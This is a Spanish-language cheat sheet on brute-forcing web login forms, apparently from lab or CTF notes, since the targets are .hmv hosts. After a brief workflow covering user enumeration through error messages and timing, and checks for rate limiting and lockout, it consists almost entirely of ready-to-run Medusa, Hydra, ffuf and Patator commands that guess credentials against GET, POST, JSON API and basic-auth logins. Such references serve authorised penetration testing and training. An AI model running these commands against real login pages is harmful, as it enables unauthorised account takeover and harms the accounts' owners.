Bruteforcing
El bruteforcing nos sirve para probar credenciales hasta que encontremos las validas.
Workflow
-
Identificar endpoints de login:
/login, /auth, /signin -
Analizar respuestas:
- Mirar si devuelve mensaje de errores diferentes si el usuario existe o si no.
- Mirar tiempo de respuesta si el usuario existe o si no.
- Mirar cookies, session etc...
-
Verificar si hay protección: MFA,Captcha, Rate Limiting, Account Lockout.
-
Mirar default credentials.
Medusa
| Comando | Descripcion |
|---|---|
medusa -h target.hmv -u admin -P passwords.txt -M http |
Bruteforce GET basico |
medusa -h target.hmv -U users.txt -P passwords.txt -M http |
Usuarios + passwords |
medusa -h target.hmv -u admin -P passwords.txt -t 10 -M http |
Threads |
medusa -h target.hmv -u admin -P passwords.txt -M https |
Https |
medusa -h target.hmv -u admin -P passwords.txt -M http -m FORM:"/login.php?user=^USER^&pass=^PASS^:F=Invalid" |
GET basico en URL |
medusa -h target.hmv -u admin -P passwords.txt -M http -m FORM:"/login.php:username=^USER^&password=^PASS^:F=Invalid" |
Bruteforce POST basico |
medusa -h target.hmv -U users.txt -P passwords.txt -M http -m FORM:"/login.php:user=^USER^&pass=^PASS^:F=Login failed" |
Bruteforce POST basico con varios usuarios |
medusa -h target.hmv -u admin -P passwords.txt -M http -m FORM:"/login.php:user=^USER^&pass=^PASS^:S=Welcome" |
Detectar Success por string |
medusa -h target.hmv -u admin -P passwords.txt -t 10 -M http -m FORM:"/login.php:user=^USER^&pass=^PASS^:F=Invalid" |
Detectar Failure + Threads |
medusa -h target.com -u admin -P passwords.txt -M http -m FORM:"/api/login:{\"user\":\"^USER^\",\"pass\":\"^PASS^\"}:F=error" |
JSON basico |
Hydra
| Comando | Descripcion |
|---|---|
hydra -l admin -P passwords.txt target.hmv http-post-form "/login.php:user=^USER^&pass=^PASS^:F=Invalid" |
Bruteforce POST |
hydra -L users.txt -P passwords.txt target.hmv http-post-form "/login.php:user=^USER^&pass=^PASS^:F=Invalid" |
Bruteforce usuarios y passwords |
hydra -l admin -P passwords.txt target.hmv http-get-form "/login.php:user=^USER^&pass=^PASS^:F=Invalid" |
Bruteforce GET |
hydra -l admin -P passwords.txt target.hmv https-post-form "/login.php:user=^USER^&pass=^PASS^:F=Invalid" |
Bruteforce HTTPS |
hydra -l admin -P passwords.txt target.hmv http-post-form "/login.php:user=^USER^&pass=^PASS^:S=Welcome" |
Detecta string Welcome como valido |
hydra -l admin -P passwords.txt -t 16 -V target.com http-post-form "/login.php:user=^USER^&pass=^PASS^:F=Invalid" |
Verbose + threads |
hydra -l admin -P passwords.txt target.hmv http-post-json "/api/login:{\"user\":\"^USER^\",\"pass\":\"^PASS^\"}:F=error" |
Bruteforce JSON API |
hydra -L usernames.txt -P passwords.txt www.target.hmv http-get |
Basic GET auth |
hydra -l admin -P passwords.txt target.hmv http-get / -s 1337 |
Basic auth en puerto custom |
hydra -l admin -P passwords.txt target.hmv http-post-form "/login:user=^USER^&pass=^PASS^:S=302" |
Web Login Form |
Ffuf
| Comando | Descripcion |
|---|---|
ffuf -u http://target.hmv/login -X POST -d "user=admin&pass=FUZZ" -w passwords.txt -fr "Invalid" |
Bruteforce password |
ffuf -u http://target.hmv/login -X POST -d "user=FUZZ&pass=1234" -w users.txt -fr "Invalid" |
Bruteforce usuario |
ffuf -u http://target.hmv/login -X POST -d "user=FUZZ&pass=FUZ2Z" -w users.txt:FUZZ -w passwords.txt:FUZ2Z |
Bruteforce user/pass |
ffuf -u http://target.hmv/api/login -X POST -H "Content-Type: application/json" -d '{"user":"admin","pass":"FUZZ"}' -w passwords.txt -fr "error" |
Bruteforce JSON API |
ffuf -u http://target.hmv/login?user=admin&pass=FUZZ -w passwords.txt -fr "Invalid" |
Bruteforce GET |
ffuf -u http://target.hmv/login -X POST -d "user=admin&pass=FUZZ" -w passwords.txt -mc 200 |
Filtrar por codigo HTTP |
ffuf -u http://target.hmv/login -X POST -d "user=admin&pass=FUZZ" -w passwords.txt -fs 1234 |
Filtrar por tamaño respuesta |
Patator
| Comando | Descripcion |
|---|---|
patator http_fuzz url=http://target.hmv/login method=POST body='user=admin&pass=FILE0' 0=passwords.txt -x ignore:fgrep='Invalid' |
POST basico |
patator http_fuzz url=http://target.hmv/login method=POST body='user=FILE0&pass=FILE1' 0=users.txt 1=passwords.txt |
Usuario + password |
patator http_fuzz url=http://target.hmv/login method=GET url='http://target.com/login?user=admin&pass=FILE0' 0=passwords.txt |
GET |
patator http_fuzz url=http://target.hmv/api/login method=POST header='Content-Type: application/json' body='{"user":"admin","pass":"FILE0"}' 0=passwords.txt |
JSON |
patator http_fuzz url=http://target.hmv/login method=POST body='user=admin&pass=FILE0' 0=passwords.txt -x ignore:code=401 |
Filtra por codigo HTTP |
patator http_fuzz url=http://target.hmv/login method=POST body='user=admin&pass=FILE0' 0=passwords.txt -t 10 |
Usar 10 threads |